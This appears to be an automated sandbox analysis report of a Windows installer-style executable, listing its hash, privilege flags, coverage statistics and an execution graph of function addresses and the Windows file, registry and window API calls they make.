                                                                                                                                                                                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:20.1%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                      Signature Coverage:19.5%
                                                                                                                                                                                                                      Total number of Nodes:1595
                                                                                                                                                                                                                      Total number of Limit Nodes:37
                                                                                                                                                                                                                      execution_graph 4171 401941 4172 401943 4171->4172 4177 402c41 4172->4177 4178 402c4d 4177->4178 4222 40640a 4178->4222 4181 401948 4183 405afa 4181->4183 4264 405dc5 4183->4264 4186 405b22 DeleteFileW 4188 401951 4186->4188 4187 405b39 4190 405c59 4187->4190 4278 4063e8 lstrcpynW 4187->4278 4190->4188 4307 40672b FindFirstFileW 4190->4307 4191 405b5f 4192 405b72 4191->4192 4193 405b65 lstrcatW 4191->4193 4279 405d09 lstrlenW 4192->4279 4194 405b78 4193->4194 4197 405b88 lstrcatW 4194->4197 4199 405b93 lstrlenW FindFirstFileW 4194->4199 4197->4199 4199->4190 4206 405bb5 4199->4206 4200 405c82 4310 405cbd lstrlenW CharPrevW 4200->4310 4203 405c3c FindNextFileW 4203->4206 4207 405c52 FindClose 4203->4207 4204 405ab2 5 API calls 4208 405c94 4204->4208 4206->4203 4218 405bfd 4206->4218 4283 4063e8 lstrcpynW 4206->4283 4207->4190 4209 405c98 4208->4209 4210 405cae 4208->4210 4209->4188 4213 405450 24 API calls 4209->4213 4212 405450 24 API calls 4210->4212 4212->4188 4215 405ca5 4213->4215 4214 405afa 60 API calls 4214->4218 4217 4061ae 36 API calls 4215->4217 4216 405450 24 API calls 4216->4203 4219 405cac 4217->4219 4218->4203 4218->4214 4218->4216 4284 405ab2 4218->4284 4292 405450 4218->4292 4303 4061ae MoveFileExW 4218->4303 4219->4188 4234 406417 4222->4234 4223 406662 4224 402c6e 4223->4224 4255 4063e8 lstrcpynW 4223->4255 4224->4181 4239 40667c 4224->4239 4226 406630 lstrlenW 4226->4234 4229 40640a 10 API calls 4229->4226 4230 406545 GetSystemDirectoryW 4230->4234 4232 406558 GetWindowsDirectoryW 4232->4234 4233 40667c 5 API calls 4233->4234 4234->4223 4234->4226 4234->4229 4234->4230 4234->4232 4234->4233 4235 40658c SHGetSpecialFolderLocation 4234->4235 4236 40640a 10 API calls 4234->4236 4237 4065d3 lstrcatW 4234->4237 4248 4062b6 4234->4248 4253 40632f wsprintfW 4234->4253 4254 4063e8 lstrcpynW 4234->4254 4235->4234 4238 4065a4 SHGetPathFromIDListW CoTaskMemFree 4235->4238 4236->4234 4237->4234 4238->4234 4240 406689 4239->4240 4242 4066f2 CharNextW 4240->4242 4245 4066ff 4240->4245 4246 4066de CharNextW 4240->4246 4247 4066ed CharNextW 4240->4247 4260 405cea 4240->4260 4241 406704 CharPrevW 4241->4245 4242->4240 4242->4245 4243 406725 4243->4181 4245->4241 4245->4243 4246->4240 4247->4242 4256 406255 4248->4256 4251 4062ea RegQueryValueExW RegCloseKey 4252 40631a 4251->4252 4252->4234 4253->4234 4254->4234 4255->4224 4257 406264 4256->4257 4258 406268 4257->4258 4259 40626d RegOpenKeyExW 4257->4259 4258->4251 4258->4252 4259->4258 4261 405cf0 4260->4261 4262 405d06 4261->4262 4263 405cf7 CharNextW 4261->4263 4262->4240 4263->4261 4313 4063e8 lstrcpynW 4264->4313 4266 405dd6 4314 405d68 CharNextW CharNextW 4266->4314 4269 405b1a 4269->4186 4269->4187 4270 40667c 5 API calls 4276 405dec 4270->4276 4271 405e1d lstrlenW 4272 405e28 4271->4272 4271->4276 4273 405cbd 3 API calls 4272->4273 4275 405e2d GetFileAttributesW 4273->4275 4274 40672b 2 API calls 4274->4276 4275->4269 4276->4269 4276->4271 4276->4274 4277 405d09 2 API calls 4276->4277 4277->4271 4278->4191 4280 405d17 4279->4280 4281 405d29 4280->4281 4282 405d1d CharPrevW 4280->4282 4281->4194 4282->4280 4282->4281 4283->4206 4320 405eb9 GetFileAttributesW 4284->4320 4287 405adf 4287->4218 4288 405ad5 DeleteFileW 4290 405adb 4288->4290 4289 405acd RemoveDirectoryW 4289->4290 4290->4287 4291 405aeb SetFileAttributesW 4290->4291 4291->4287 4293 40546b 4292->4293 4302 40550d 4292->4302 4294 405487 lstrlenW 4293->4294 4295 40640a 17 API calls 4293->4295 4296 4054b0 4294->4296 4297 405495 lstrlenW 4294->4297 4295->4294 4298 4054c3 4296->4298 4299 4054b6 SetWindowTextW 4296->4299 4300 4054a7 lstrcatW 4297->4300 4297->4302 4301 4054c9 SendMessageW SendMessageW SendMessageW 4298->4301 4298->4302 4299->4298 4300->4296 4301->4302 4302->4218 4304 4061cf 4303->4304 4305 4061c2 4303->4305 4304->4218 4323 406034 4305->4323 4308 406741 FindClose 4307->4308 4309 405c7e 4307->4309 4308->4309 4309->4188 4309->4200 4311 405c88 4310->4311 4312 405cd9 lstrcatW 4310->4312 4311->4204 4312->4311 4313->4266 4315 405d85 4314->4315 4318 405d97 4314->4318 4317 405d92 CharNextW 4315->4317 4315->4318 4316 405dbb 4316->4269 4316->4270 4317->4316 4318->4316 4319 405cea CharNextW 4318->4319 4319->4318 4321 405abe 4320->4321 4322 405ecb SetFileAttributesW 4320->4322 4321->4287 4321->4288 4321->4289 4322->4321 4324 406064 4323->4324 4325 40608a GetShortPathNameW 4323->4325 4350 405ede GetFileAttributesW CreateFileW 4324->4350 4327 4061a9 4325->4327 4328 40609f 4325->4328 4327->4304 4328->4327 4330 4060a7 wsprintfA 4328->4330 4329 40606e CloseHandle GetShortPathNameW 4329->4327 4331 406082 4329->4331 4332 40640a 17 API calls 4330->4332 4331->4325 4331->4327 4333 4060cf 4332->4333 4351 405ede GetFileAttributesW CreateFileW 4333->4351 4335 4060dc 4335->4327 4336 4060eb GetFileSize GlobalAlloc 4335->4336 4337 4061a2 CloseHandle 4336->4337 4338 40610d 4336->4338 4337->4327 4352 405f61 ReadFile 4338->4352 4343 406140 4345 405e43 4 API calls 4343->4345 4344 40612c lstrcpyA 4346 40614e 4344->4346 4345->4346 4347 406185 SetFilePointer 4346->4347 4359 405f90 WriteFile 4347->4359 4350->4329 4351->4335 4353 405f7f 4352->4353 4353->4337 4354 405e43 lstrlenA 4353->4354 4355 405e84 lstrlenA 4354->4355 4356 405e8c 4355->4356 4357 405e5d lstrcmpiA 4355->4357 4356->4343 4356->4344 4357->4356 4358 405e7b CharNextA 4357->4358 4358->4355 4360 405fae GlobalFree 4359->4360 4360->4337 4361 4015c1 4362 402c41 17 API calls 4361->4362 4363 4015c8 4362->4363 4364 405d68 4 API calls 4363->4364 4375 4015d1 4364->4375 4365 401631 4367 401663 4365->4367 4368 401636 4365->4368 4366 405cea CharNextW 4366->4375 4370 401423 24 API calls 4367->4370 4388 401423 4368->4388 4377 40165b 4370->4377 4374 40164a SetCurrentDirectoryW 4374->4377 4375->4365 4375->4366 4378 401617 GetFileAttributesW 4375->4378 4380 4059b9 4375->4380 4383 40591f CreateDirectoryW 4375->4383 4392 40599c CreateDirectoryW 4375->4392 4378->4375 4395 4067c2 GetModuleHandleA 4380->4395 4384 405970 GetLastError 4383->4384 4385 40596c 4383->4385 4384->4385 4386 40597f SetFileSecurityW 4384->4386 4385->4375 4386->4385 4387 405995 GetLastError 4386->4387 4387->4385 4389 405450 24 API calls 4388->4389 4390 401431 4389->4390 4391 4063e8 lstrcpynW 4390->4391 4391->4374 4393 4059b0 GetLastError 4392->4393 4394 4059ac 4392->4394 4393->4394 4394->4375 4396 4067e8 GetProcAddress 4395->4396 4397 4067de 4395->4397 4399 4059c0 4396->4399 4401 406752 GetSystemDirectoryW 4397->4401 4399->4375 4400 4067e4 4400->4396 4400->4399 4402 406774 wsprintfW LoadLibraryExW 4401->4402 4402->4400 4404 4053c4 4405 4053d4 4404->4405 4406 4053e8 4404->4406 4408 405431 4405->4408 4409 4053da 4405->4409 4407 4053f0 IsWindowVisible 4406->4407 4416 405410 4406->4416 4407->4408 4410 4053fd 4407->4410 4411 405436 CallWindowProcW 4408->4411 4418 4043ab 4409->4418 4421 404d1a SendMessageW 4410->4421 4414 4053e4 4411->4414 4416->4411 4426 404d9a 4416->4426 4419 4043c3 4418->4419 4420 4043b4 SendMessageW 4418->4420 4419->4414 4420->4419 4422 404d79 SendMessageW 4421->4422 4423 404d3d GetMessagePos ScreenToClient SendMessageW 4421->4423 4424 404d71 4422->4424 4423->4424 4425 404d76 4423->4425 4424->4416 4425->4422 4435 4063e8 lstrcpynW 4426->4435 4428 404dad 4436 40632f wsprintfW 4428->4436 4430 404db7 4437 40140b 4430->4437 4434 404dc7 4434->4408 4435->4428 4436->4430 4441 401389 4437->4441 4440 4063e8 lstrcpynW 4440->4434 4443 401390 4441->4443 4442 4013fe 4442->4440 4443->4442 4444 4013cb MulDiv SendMessageW 4443->4444 4444->4443 4889 401e49 4890 402c1f 17 API calls 4889->4890 4891 401e4f 4890->4891 4892 402c1f 17 API calls 4891->4892 4893 401e5b 4892->4893 4894 401e72 EnableWindow 4893->4894 4895 401e67 ShowWindow 4893->4895 4896 402ac5 4894->4896 4895->4896 4897 40264a 4898 402c1f 17 API calls 4897->4898 4899 402659 4898->4899 4900 4026a3 ReadFile 4899->4900 4901 405f61 ReadFile 4899->4901 4902 4026e3 MultiByteToWideChar 4899->4902 4903 402798 4899->4903 4906 40273c 4899->4906 4907 402709 SetFilePointer MultiByteToWideChar 4899->4907 4908 4027a9 4899->4908 4910 402796 4899->4910 4900->4899 4900->4910 4901->4899 4902->4899 4920 40632f wsprintfW 4903->4920 4906->4899 4906->4910 4911 405fbf SetFilePointer 4906->4911 4907->4899 4909 4027ca SetFilePointer 4908->4909 4908->4910 4909->4910 4912 405fdb 4911->4912 4913 405ff3 4911->4913 4914 405f61 ReadFile 4912->4914 4913->4906 4915 405fe7 4914->4915 4915->4913 4916 406024 SetFilePointer 4915->4916 4917 405ffc SetFilePointer 4915->4917 4916->4913 4917->4916 4918 406007 4917->4918 4919 405f90 WriteFile 4918->4919 4919->4913 4920->4910 4921 6f1d2997 4922 6f1d29e7 4921->4922 4923 6f1d29a7 VirtualProtect 4921->4923 4923->4922 4924 404dcc GetDlgItem GetDlgItem 4925 404e1e 7 API calls 4924->4925 4928 405037 4924->4928 4926 404ec1 DeleteObject 4925->4926 4927 404eb4 SendMessageW 4925->4927 4929 404eca 4926->4929 4927->4926 4935 4050fc 4928->4935 4939 405097 4928->4939 4948 40511b 4928->4948 4930 404f01 4929->4930 4931 404ed9 4929->4931 4933 40435f 18 API calls 4930->4933 4932 40640a 17 API calls 4931->4932 4936 404ee3 SendMessageW SendMessageW 4932->4936 4940 404f15 4933->4940 4934 4051c7 4937 4051d1 SendMessageW 4934->4937 4938 4051d9 4934->4938 4943 40510d SendMessageW 4935->4943 4935->4948 4936->4929 4937->4938 4949 4051f2 4938->4949 4950 4051eb ImageList_Destroy 4938->4950 4957 405202 4938->4957 4944 404d1a 5 API calls 4939->4944 4945 40435f 18 API calls 4940->4945 4941 4053af 4942 4043c6 8 API calls 4941->4942 4947 4053bd 4942->4947 4943->4948 4961 4050a8 4944->4961 4962 404f23 4945->4962 4946 405174 SendMessageW 4946->4941 4952 405189 SendMessageW 4946->4952 4948->4934 4948->4941 4948->4946 4953 4051fb GlobalFree 4949->4953 4949->4957 4950->4949 4951 405371 4951->4941 4958 405383 ShowWindow GetDlgItem ShowWindow 4951->4958 4955 40519c 4952->4955 4953->4957 4954 404ff8 GetWindowLongW SetWindowLongW 4956 405011 4954->4956 4967 4051ad SendMessageW 4955->4967 4959 405017 ShowWindow 4956->4959 4960 40502f 4956->4960 4957->4951 4971 404d9a 4 API calls 4957->4971 4975 40523d 4957->4975 4958->4941 4980 404394 SendMessageW 4959->4980 4981 404394 SendMessageW 4960->4981 4961->4935 4962->4954 4963 404ff2 4962->4963 4966 404f73 SendMessageW 4962->4966 4969 404fc0 SendMessageW 4962->4969 4970 404faf SendMessageW 4962->4970 4963->4954 4963->4956 4966->4962 4967->4934 4968 40502a 4968->4941 4969->4962 4970->4962 4971->4975 4972 405347 InvalidateRect 4972->4951 4973 40535d 4972->4973 4982 404cd5 4973->4982 4974 40526b SendMessageW 4976 405281 4974->4976 4975->4974 4975->4976 4976->4972 4977 4052e2 4976->4977 4979 4052f5 SendMessageW SendMessageW 4976->4979 4977->4979 4979->4976 4980->4968 4981->4928 4985 404c0c 4982->4985 4984 404cea 4984->4951 4986 404c25 4985->4986 4987 40640a 17 API calls 4986->4987 4988 404c89 4987->4988 4989 40640a 17 API calls 4988->4989 4990 404c94 4989->4990 4991 40640a 17 API calls 4990->4991 4992 404caa lstrlenW wsprintfW SetDlgItemTextW 4991->4992 4992->4984 5292 4016cc 5293 402c41 17 API calls 5292->5293 5294 4016d2 GetFullPathNameW 5293->5294 5295 4016ec 5294->5295 5301 40170e 5294->5301 5297 40672b 2 API calls 5295->5297 5295->5301 5296 401723 GetShortPathNameW 5298 402ac5 5296->5298 5299 4016fe 5297->5299 5299->5301 5302 4063e8 lstrcpynW 5299->5302 5301->5296 5301->5298 5302->5301 5303 40234e 5304 402c41 17 API calls 5303->5304 5305 40235d 5304->5305 5306 402c41 17 API calls 5305->5306 5307 402366 5306->5307 5308 402c41 17 API calls 5307->5308 5309 402370 GetPrivateProfileStringW 5308->5309 5310 4044cf lstrlenW 5311 4044f0 WideCharToMultiByte 5310->5311 5312 4044ee 5310->5312 5312->5311 5313 404850 5314 40487c 5313->5314 5315 40488d 5313->5315 5374 405a32 GetDlgItemTextW 5314->5374 5317 404899 GetDlgItem 5315->5317 5323 4048f8 5315->5323 5320 4048ad 5317->5320 5318 4049dc 5322 404b8b 5318->5322 5376 405a32 GetDlgItemTextW 5318->5376 5319 404887 5321 40667c 5 API calls 5319->5321 5325 4048c1 SetWindowTextW 5320->5325 5326 405d68 4 API calls 5320->5326 5321->5315 5330 4043c6 8 API calls 5322->5330 5323->5318 5323->5322 5327 40640a 17 API calls 5323->5327 5329 40435f 18 API calls 5325->5329 5331 4048b7 5326->5331 5332 40496c SHBrowseForFolderW 5327->5332 5328 404a0c 5333 405dc5 18 API calls 5328->5333 5334 4048dd 5329->5334 5335 404b9f 5330->5335 5331->5325 5339 405cbd 3 API calls 5331->5339 5332->5318 5336 404984 CoTaskMemFree 5332->5336 5337 404a12 5333->5337 5338 40435f 18 API calls 5334->5338 5340 405cbd 3 API calls 5336->5340 5377 4063e8 lstrcpynW 5337->5377 5341 4048eb 5338->5341 5339->5325 5342 404991 5340->5342 5375 404394 SendMessageW 5341->5375 5345 4049c8 SetDlgItemTextW 5342->5345 5350 40640a 17 API calls 5342->5350 5345->5318 5346 4048f1 5348 4067c2 5 API calls 5346->5348 5347 404a29 5349 4067c2 5 API calls 5347->5349 5348->5323 5356 404a30 5349->5356 5351 4049b0 lstrcmpiW 5350->5351 5351->5345 5354 4049c1 lstrcatW 5351->5354 5352 404a71 5378 4063e8 lstrcpynW 5352->5378 5354->5345 5355 404a78 5357 405d68 4 API calls 5355->5357 5356->5352 5360 405d09 2 API calls 5356->5360 5362 404ac9 5356->5362 5358 404a7e GetDiskFreeSpaceW 5357->5358 5361 404aa2 MulDiv 5358->5361 5358->5362 5360->5356 5361->5362 5363 404b3a 5362->5363 5365 404cd5 20 API calls 5362->5365 5364 404b5d 5363->5364 5366 40140b 2 API calls 5363->5366 5379 404381 EnableWindow 5364->5379 5367 404b27 5365->5367 5366->5364 5369 404b3c SetDlgItemTextW 5367->5369 5370 404b2c 5367->5370 5369->5363 5372 404c0c 20 API calls 5370->5372 5371 404b79 5371->5322 5380 4047a9 5371->5380 5372->5363 5374->5319 5375->5346 5376->5328 5377->5347 5378->5355 5379->5371 5381 4047b7 5380->5381 5382 4047bc SendMessageW 5380->5382 5381->5382 5382->5322 5383 401b53 5384 402c41 17 API calls 5383->5384 5385 401b5a 5384->5385 5386 402c1f 17 API calls 5385->5386 5387 401b63 wsprintfW 5386->5387 5388 402ac5 5387->5388 5389 401956 5390 402c41 17 API calls 5389->5390 5391 40195d lstrlenW 5390->5391 5392 402592 5391->5392 5400 4014d7 5401 402c1f 17 API calls 5400->5401 5402 4014dd Sleep 5401->5402 5404 402ac5 5402->5404 5405 401f58 5406 402c41 17 API calls 5405->5406 5407 401f5f 5406->5407 5408 40672b 2 API calls 5407->5408 5409 401f65 5408->5409 5411 401f76 5409->5411 5412 40632f wsprintfW 5409->5412 5412->5411 5413 402259 5414 402c41 17 API calls 5413->5414 5415 40225f 5414->5415 5416 402c41 17 API calls 5415->5416 5417 402268 5416->5417 5418 402c41 17 API calls 5417->5418 5419 402271 5418->5419 5420 40672b 2 API calls 5419->5420 5421 40227a 5420->5421 5422 40228b lstrlenW lstrlenW 5421->5422 5426 40227e 5421->5426 5424 405450 24 API calls 5422->5424 5423 405450 24 API calls 5427 402286 5423->5427 5425 4022c9 SHFileOperationW 5424->5425 5425->5426 5425->5427 5426->5423 5283 40175c 5284 402c41 17 API calls 5283->5284 5285 401763 5284->5285 5286 405f0d 2 API calls 5285->5286 5287 40176a 5286->5287 5288 405f0d 2 API calls 5287->5288 5288->5287 5428 6f1d2301 5429 6f1d236b 5428->5429 5430 6f1d2376 GlobalAlloc 5429->5430 5431 6f1d2395 5429->5431 5430->5429 5432 401d5d GetDlgItem GetClientRect 5433 402c41 17 API calls 5432->5433 5434 401d8f LoadImageW SendMessageW 5433->5434 5435 402ac5 5434->5435 5436 401dad DeleteObject 5434->5436 5436->5435 5437 6f1d1000 5440 6f1d101b 5437->5440 5447 6f1d1516 5440->5447 5442 6f1d1020 5443 6f1d1024 5442->5443 5444 6f1d1027 GlobalAlloc 5442->5444 5445 6f1d153d 3 API calls 5443->5445 5444->5443 5446 6f1d1019 5445->5446 5449 6f1d151c 5447->5449 5448 6f1d1522 5448->5442 5449->5448 5450 6f1d152e GlobalFree 5449->5450 5450->5442 5451 4022dd 5452 4022e4 5451->5452 5455 4022f7 5451->5455 5453 40640a 17 API calls 5452->5453 5454 4022f1 5453->5454 5456 405a4e MessageBoxIndirectW 5454->5456 5456->5455 5457 6f1d103d 5458 6f1d101b 5 API calls 5457->5458 5459 6f1d1056 5458->5459 5460 401563 5461 402a6b 5460->5461 5464 40632f wsprintfW 5461->5464 5463 402a70 5464->5463 4445 4023e4 4446 402c41 17 API calls 4445->4446 4447 4023f6 4446->4447 4448 402c41 17 API calls 4447->4448 4449 402400 4448->4449 4462 402cd1 4449->4462 4452 402438 4453 402444 4452->4453 4466 402c1f 4452->4466 4456 402463 RegSetValueExW 4453->4456 4469 4031d6 4453->4469 4454 402c41 17 API calls 4457 40242e lstrlenW 4454->4457 4459 402479 RegCloseKey 4456->4459 4457->4452 4461 40288b 4459->4461 4463 402cec 4462->4463 4484 406283 4463->4484 4467 40640a 17 API calls 4466->4467 4468 402c34 4467->4468 4468->4453 4470 403201 4469->4470 4471 4031e5 SetFilePointer 4469->4471 4488 4032de GetTickCount 4470->4488 4471->4470 4474 405f61 ReadFile 4475 403221 4474->4475 4476 4032de 42 API calls 4475->4476 4480 40329e 4475->4480 4477 403238 4476->4477 4478 4032a4 ReadFile 4477->4478 4477->4480 4482 403247 4477->4482 4478->4480 4480->4456 4481 405f61 ReadFile 4481->4482 4482->4480 4482->4481 4483 405f90 WriteFile 4482->4483 4483->4482 4485 406292 4484->4485 4486 402410 4485->4486 4487 40629d RegCreateKeyExW 4485->4487 4486->4452 4486->4454 4486->4461 4487->4486 4489 403436 4488->4489 4490 40330c 4488->4490 4491 402e8e 32 API calls 4489->4491 4501 40345d SetFilePointer 4490->4501 4497 403208 4491->4497 4493 403317 SetFilePointer 4499 40333c 4493->4499 4497->4474 4497->4480 4498 405f90 WriteFile 4498->4499 4499->4497 4499->4498 4500 403417 SetFilePointer 4499->4500 4502 403447 4499->4502 4505 406943 4499->4505 4512 402e8e 4499->4512 4500->4489 4501->4493 4503 405f61 ReadFile 4502->4503 4504 40345a 4503->4504 4504->4499 4506 406968 4505->4506 4507 406970 4505->4507 4506->4499 4507->4506 4508 406a00 GlobalAlloc 4507->4508 4509 4069f7 GlobalFree 4507->4509 4510 406a77 GlobalAlloc 4507->4510 4511 406a6e GlobalFree 4507->4511 4508->4506 4508->4507 4509->4508 4510->4506 4510->4507 4511->4510 4513 402eb7 4512->4513 4514 402e9f 4512->4514 4515 402ec7 GetTickCount 4513->4515 4516 402ebf 4513->4516 4517 402ea8 DestroyWindow 4514->4517 4520 402eaf 4514->4520 4519 402ed5 4515->4519 4515->4520 4527 4067fe 4516->4527 4517->4520 4521 402f0a CreateDialogParamW ShowWindow 4519->4521 4522 402edd 4519->4522 4520->4499 4521->4520 4522->4520 4531 402e72 4522->4531 4524 402eeb wsprintfW 4525 405450 24 API calls 4524->4525 4526 402f08 4525->4526 4526->4520 4528 40681b PeekMessageW 4527->4528 4529 406811 DispatchMessageW 4528->4529 4530 40682b 4528->4530 4529->4528 4530->4520 4532 402e81 4531->4532 4533 402e83 MulDiv 4531->4533 4532->4533 4533->4524 5465 4071e5 5468 406976 5465->5468 5466 406a00 GlobalAlloc 5466->5468 5469 4072e1 5466->5469 5467 4069f7 GlobalFree 5467->5466 5468->5466 5468->5467 5468->5468 5468->5469 5470 406a77 GlobalAlloc 5468->5470 5471 406a6e GlobalFree 5468->5471 5470->5468 5470->5469 5471->5470 5472 402868 5473 402c41 17 API calls 5472->5473 5474 40286f FindFirstFileW 5473->5474 5475 402882 5474->5475 5476 402897 5474->5476 5480 40632f wsprintfW 5476->5480 5478 4028a0 5481 4063e8 lstrcpynW 5478->5481 5480->5478 5481->5475 5482 401968 5483 402c1f 17 API calls 5482->5483 5484 40196f 5483->5484 5485 402c1f 17 API calls 5484->5485 5486 40197c 5485->5486 5487 402c41 17 API calls 5486->5487 5488 401993 lstrlenW 5487->5488 5490 4019a4 5488->5490 5489 4019e5 5490->5489 5494 4063e8 lstrcpynW 5490->5494 5492 4019d5 5492->5489 5493 4019da lstrlenW 5492->5493 5493->5489 5494->5492 5495 40166a 5496 402c41 17 API calls 5495->5496 5497 401670 5496->5497 5498 40672b 2 API calls 5497->5498 5499 401676 5498->5499 5022 40176f 5023 402c41 17 API calls 5022->5023 5024 401776 5023->5024 5025 401796 5024->5025 5026 40179e 5024->5026 5061 4063e8 lstrcpynW 5025->5061 5062 4063e8 lstrcpynW 5026->5062 5029 40179c 5033 40667c 5 API calls 5029->5033 5030 4017a9 5031 405cbd 3 API calls 5030->5031 5032 4017af lstrcatW 5031->5032 5032->5029 5037 4017bb 5033->5037 5034 40672b 2 API calls 5034->5037 5035 405eb9 2 API calls 5035->5037 5037->5034 5037->5035 5038 4017cd CompareFileTime 5037->5038 5039 40188d 5037->5039 5047 40640a 17 API calls 5037->5047 5051 4063e8 lstrcpynW 5037->5051 5056 405a4e MessageBoxIndirectW 5037->5056 5057 401864 5037->5057 5060 405ede GetFileAttributesW CreateFileW 5037->5060 5038->5037 5040 405450 24 API calls 5039->5040 5042 401897 5040->5042 5041 405450 24 API calls 5059 401879 5041->5059 5043 4031d6 44 API calls 5042->5043 5044 4018aa 5043->5044 5045 4018be SetFileTime 5044->5045 5046 4018d0 FindCloseChangeNotification 5044->5046 5045->5046 5048 4018e1 5046->5048 5046->5059 5047->5037 5049 4018e6 5048->5049 5050 4018f9 5048->5050 5052 40640a 17 API calls 5049->5052 5053 40640a 17 API calls 5050->5053 5051->5037 5054 4018ee lstrcatW 5052->5054 5055 401901 5053->5055 5054->5055 5058 405a4e MessageBoxIndirectW 5055->5058 5056->5037 5057->5041 5057->5059 5058->5059 5060->5037 5061->5029 5062->5030 5063 4027ef 5064 4027f6 5063->5064 5067 402a70 5063->5067 5065 402c1f 17 API calls 5064->5065 5066 4027fd 5065->5066 5068 40280c SetFilePointer 5066->5068 5068->5067 5069 40281c 5068->5069 5071 40632f wsprintfW 5069->5071 5071->5067 5500 401a72 5501 402c1f 17 API calls 5500->5501 5502 401a7b 5501->5502 5503 402c1f 17 API calls 5502->5503 5504 401a20 5503->5504 5505 406af2 5506 406976 5505->5506 5507 4072e1 5506->5507 5508 406a00 GlobalAlloc 5506->5508 5509 4069f7 GlobalFree 5506->5509 5510 406a77 GlobalAlloc 5506->5510 5511 406a6e GlobalFree 5506->5511 5508->5506 5508->5507 5509->5508 5510->5506 5510->5507 5511->5510 5512 401573 5513 401583 ShowWindow 5512->5513 5514 40158c 5512->5514 5513->5514 5515 402ac5 5514->5515 5516 40159a ShowWindow 5514->5516 5516->5515 5517 401cf3 5518 402c1f 17 API calls 5517->5518 5519 401cf9 IsWindow 5518->5519 5520 401a20 5519->5520 5521 402df3 5522 402e05 SetTimer 5521->5522 5523 402e1e 5521->5523 5522->5523 5524 402e6c 5523->5524 5525 402e72 MulDiv 5523->5525 5526 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5525->5526 5526->5524 5528 4014f5 SetForegroundWindow 5529 402ac5 5528->5529 5530 402576 5531 402c41 17 API calls 5530->5531 5532 40257d 5531->5532 5535 405ede GetFileAttributesW CreateFileW 5532->5535 5534 402589 5535->5534 5260 401b77 5261 401bc8 5260->5261 5266 401b84 5260->5266 5262 401bf2 GlobalAlloc 5261->5262 5263 401bcd 5261->5263 5265 40640a 17 API calls 5262->5265 5275 4022f7 5263->5275 5281 4063e8 lstrcpynW 5263->5281 5264 40640a 17 API calls 5268 4022f1 5264->5268 5269 401c0d 5265->5269 5266->5269 5270 401b9b 5266->5270 5273 405a4e MessageBoxIndirectW 5268->5273 5269->5264 5269->5275 5279 4063e8 lstrcpynW 5270->5279 5271 401bdf GlobalFree 5271->5275 5273->5275 5274 401baa 5280 4063e8 lstrcpynW 5274->5280 5277 401bb9 5282 4063e8 lstrcpynW 5277->5282 5279->5274 5280->5277 5281->5271 5282->5275 5536 4024f8 5537 402c81 17 API calls 5536->5537 5538 402502 5537->5538 5539 402c1f 17 API calls 5538->5539 5540 40250b 5539->5540 5541 402533 RegEnumValueW 5540->5541 5542 402527 RegEnumKeyW 5540->5542 5544 40288b 5540->5544 5543 402548 RegCloseKey 5541->5543 5542->5543 5543->5544 5546 40167b 5547 402c41 17 API calls 5546->5547 5548 401682 5547->5548 5549 402c41 17 API calls 5548->5549 5550 40168b 5549->5550 5551 402c41 17 API calls 5550->5551 5552 401694 MoveFileW 5551->5552 5553 4016a0 5552->5553 5554 4016a7 5552->5554 5556 401423 24 API calls 5553->5556 5555 40672b 2 API calls 5554->5555 5558 402250 5554->5558 5557 4016b6 5555->5557 5556->5558 5557->5558 5559 4061ae 36 API calls 5557->5559 5559->5553 5567 401e7d 5568 402c41 17 API calls 5567->5568 5569 401e83 5568->5569 5570 402c41 17 API calls 5569->5570 5571 401e8c 5570->5571 5572 402c41 17 API calls 5571->5572 5573 401e95 5572->5573 5574 402c41 17 API calls 5573->5574 5575 401e9e 5574->5575 5576 401423 24 API calls 5575->5576 5577 401ea5 5576->5577 5584 405a14 ShellExecuteExW 5577->5584 5579 401ee7 5580 40288b 5579->5580 5585 406873 WaitForSingleObject 5579->5585 5582 401f01 CloseHandle 5582->5580 5584->5579 5586 40688d 5585->5586 5587 40689f GetExitCodeProcess 5586->5587 5588 4067fe 2 API calls 5586->5588 5587->5582 5589 406894 WaitForSingleObject 5588->5589 5589->5586 5590 4019ff 5591 402c41 17 API calls 5590->5591 5592 401a06 5591->5592 5593 402c41 17 API calls 5592->5593 5594 401a0f 5593->5594 5595 401a16 lstrcmpiW 5594->5595 5596 401a28 lstrcmpW 5594->5596 5597 401a1c 5595->5597 5596->5597 5598 401000 5599 401037 BeginPaint GetClientRect 5598->5599 5600 40100c DefWindowProcW 5598->5600 5602 4010f3 5599->5602 5603 401179 5600->5603 5604 401073 CreateBrushIndirect FillRect DeleteObject 5602->5604 5605 4010fc 5602->5605 5604->5602 5606 401102 CreateFontIndirectW 5605->5606 5607 401167 EndPaint 5605->5607 5606->5607 5608 401112 6 API calls 5606->5608 5607->5603 5608->5607 5609 6f1d18dd 5610 6f1d1900 5609->5610 5611 6f1d1935 GlobalFree 5610->5611 5612 6f1d1947 5610->5612 5611->5612 5613 6f1d1272 2 API calls 5612->5613 5614 6f1d1ad2 GlobalFree GlobalFree 5613->5614 5615 401503 5616 40150b 5615->5616 5618 40151e 5615->5618 5617 402c1f 17 API calls 5616->5617 5617->5618 4534 402484 4545 402c81 4534->4545 4537 402c41 17 API calls 4538 402497 4537->4538 4539 4024a2 RegQueryValueExW 4538->4539 4540 40288b 4538->4540 4541 4024c8 RegCloseKey 4539->4541 4542 4024c2 4539->4542 4541->4540 4542->4541 4550 40632f wsprintfW 4542->4550 4546 402c41 17 API calls 4545->4546 4547 402c98 4546->4547 4548 406255 RegOpenKeyExW 4547->4548 4549 40248e 4548->4549 4549->4537 4550->4541 5619 402104 5620 402c41 17 API calls 5619->5620 5621 40210b 5620->5621 5622 402c41 17 API calls 5621->5622 5623 402115 5622->5623 5624 402c41 17 API calls 5623->5624 5625 40211f 5624->5625 5626 402c41 17 API calls 5625->5626 5627 402129 5626->5627 5628 402c41 17 API calls 5627->5628 5630 402133 5628->5630 5629 402172 CoCreateInstance 5634 402191 5629->5634 5630->5629 5631 402c41 17 API calls 5630->5631 5631->5629 5632 401423 24 API calls 5633 402250 5632->5633 5634->5632 5634->5633 5635 6f1d1058 5638 6f1d1074 5635->5638 5636 6f1d10dd 5637 6f1d1092 5640 6f1d1516 GlobalFree 5637->5640 